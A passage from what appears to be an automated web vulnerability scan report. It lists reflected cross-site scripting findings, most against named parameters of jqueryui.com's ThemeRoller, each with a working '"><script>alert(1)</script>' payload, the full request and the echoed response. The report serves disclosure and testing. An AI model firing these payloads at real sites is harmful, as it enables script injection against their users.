User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:55 GMT
Server: Apache
Last-Modified: Tue, 28 Oct 2008 17:22:29 GMT
ETag: "36e97-a5f-45a537df77f40"
Accept-Ranges: bytes
Content-Length: 3006
Content-Type: application/x-javascript

var mp_swver = 0;

var mp_html = "";
if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin ) {
if( na
...[SNIP]...
<PARAM NAME=FlashVars VALUE=\"clickTAG=ca6f3";alert(1)//565e2651fa8http://altfarm.mediaplex.com/ad/ck/7440-39748-1543-3?mpt=3334527\">
...[SNIP]...

3.518. http://jqueryui.com/themeroller/ [bgColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10928"><script>alert(1)</script>6fef2509755 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10928"><script>alert(1)</script>6fef2509755&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff10928"><script>alert(1)</script>6fef2509755&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

3.519. http://jqueryui.com/themeroller/ [bgColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d4e2"><script>alert(1)</script>dcce7cfb063 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff4d4e2"><script>alert(1)</script>dcce7cfb063&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff4d4e2"><script>alert(1)</script>dcce7cfb063&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

3.520. http://jqueryui.com/themeroller/ [bgColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b195c"><script>alert(1)</script>27be7fe23ad was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6b195c"><script>alert(1)</script>27be7fe23ad&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6b195c"><script>alert(1)</script>27be7fe23ad&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

3.521. http://jqueryui.com/themeroller/ [bgColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e489"><script>alert(1)</script>dc7a9b05d2b was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc1e489"><script>alert(1)</script>dc7a9b05d2b&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc1e489"><script>alert(1)</script>dc7a9b05d2b&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

3.522. http://jqueryui.com/themeroller/ [bgColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3461"><script>alert(1)</script>dc9603a665a was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadaa3461"><script>alert(1)</script>dc9603a665a&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadaa3461"><script>alert(1)</script>dc9603a665a&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

3.523. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b06"><script>alert(1)</script>260e8928b06 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7570b06"><script>alert(1)</script>260e8928b06&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7570b06"><script>alert(1)</script>260e8928b06&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

3.524. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 412a9"><script>alert(1)</script>d0a34beb0ed was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75412a9"><script>alert(1)</script>d0a34beb0ed&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75412a9"><script>alert(1)</script>d0a34beb0ed&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

3.525. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6733"><script>alert(1)</script>827db728bcf was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75f6733"><script>alert(1)</script>827db728bcf&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75f6733"><script>alert(1)</script>827db728bcf&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

3.526. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e781b"><script>alert(1)</script>d89796c6075 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75e781b"><script>alert(1)</script>d89796c6075&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75e781b"><script>alert(1)</script>d89796c6075&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

3.527. http://jqueryui.com/themeroller/ [bgTextureActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

